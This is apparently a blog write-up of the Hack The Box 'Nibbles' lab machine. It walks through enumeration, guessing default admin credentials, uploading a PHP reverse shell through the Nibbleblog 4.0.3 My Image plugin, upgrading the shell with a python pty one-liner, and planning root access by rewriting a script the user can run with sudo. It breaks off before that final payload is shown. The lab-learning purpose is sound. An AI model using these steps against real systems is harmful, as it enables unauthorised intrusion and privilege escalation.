Hack The Box: Nibbles Walkthrough without Metasploit

5 min readMar 21, 2021

Nibbles is an easy machine found on hack the box and it is a confidence booster for a naive like me.

Every time, While starting the box one should keep in mind to push the limits before taking help from the internet and other write-ups.

Let’s play with nibbles and perform the exploitation without using Metasploit.

Machine: Nibbles
OS: Linux
IP: 10.10.10.75

Enumeration

As usual, we will start with the script for enumeration, I have heard about tools like Auto-recon but, i haven’t used that yet. (May use it sometime where it is really needed.)

Don’t forget to give executable permission to the script.

chmod +x en.sh

en.sh

Results

Points to consider:

ssh on port 22 . OpenSSH → 7.2p2(have seen it many times and i remember we have user enum script for this )

2. http on port 80. Apache → 2.4.18 (Also this is common.. dirbuster is the go to tool for this.)

We have a starting point as of now ie, Dirbuster.

Meanwhile, Let’s go and check the website itself in the browser.

Nothing…!!

But i do remember, that our professor use to give this type of ctf in the classroom. Whenever an image , text, white-space or blank page appears , We use to go to the source code to find the hints there.

Here we go,

<! — /nibbleblog/ directory. Nothing interesting here!- -

Some Questions may arise like why only this time we went ahead to search for page source and why not every other time. these questions are totally valid at one place. but in other scenarios we already had something to move our process ahead.

Also If you are one of a kind, who always have these questions like me , just add this step your http enumeration sheet and do it every-time regardless of it needed or not.

Also i didn’t find any dir or files in dirbuster

For now, let’s go and see whats there in the directory /nibbleblog

Directed to this webpage , tried clicking on some categories in hope of finding something but nothing worked. At the right down corner “powered by Nibbleblog” was written. Tried searching it on Internet.

Points to consider for nibbleblog:

Open source and use to create blogs
Need PHP to work (that means php is already there)
Websites generally list their latest version to download and here it is v4.0.5 (so the version installed will be = or < 4.0.5)

Let’s Enmerate /nibbleblog/ directory further…

Also this….

And this….

Let’s try and see “admin.php”

Directed to this page, we need username password…

lets start with the common ones..

Nothing worked. also search nibbles as username or password, but before that lets search on Internet for two things,

default username-password for nibbleblog.
exploit for nibbleblog. (we need to find version of it first)

Let’s go to README file we got earlier.

Finally, we got the version atleast…

Exploitation

Let’s find exploit for nibbleblog v4.0.3.

Got one exploit , but we still need user-pass to enter the page and it must be admin credentials.

Also it seems like it is code execution for php, and we have script in our /usr/share/webshells/php/

This thing is interesting …. the more you play .. the more you will know what to find and where.. don’t have to google search everything if you have practice enough.

Let’s try nibbles as admin password…

Thankgod..!! admin-nibbles worked.

Let’s follow the directions given on the exploit page..

go to plugins → My image → let’s upload the php revershell there…

Don’t forget to change the IP and Port no. in the reverse shell script.

Browse → upload the php file → save changes

Ignore the Warnings…

Setup Netcat listener on your attacker’s machine… and traverse to the file where the file is uploaded.

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

Let’s convert the shell using pty.

python3 -c 'import pty; pty.spawn("/bin/bash")'

According to this, we can run monitor.sh without root password.

Here personal.zip is present , unzip it and we can find monitor.sh is inside of it , but contains some health detection metrics and what not .. it is of no use .. but we can change the content of the file to gain root shell.

Add the below code in a file and name it monitor.sh: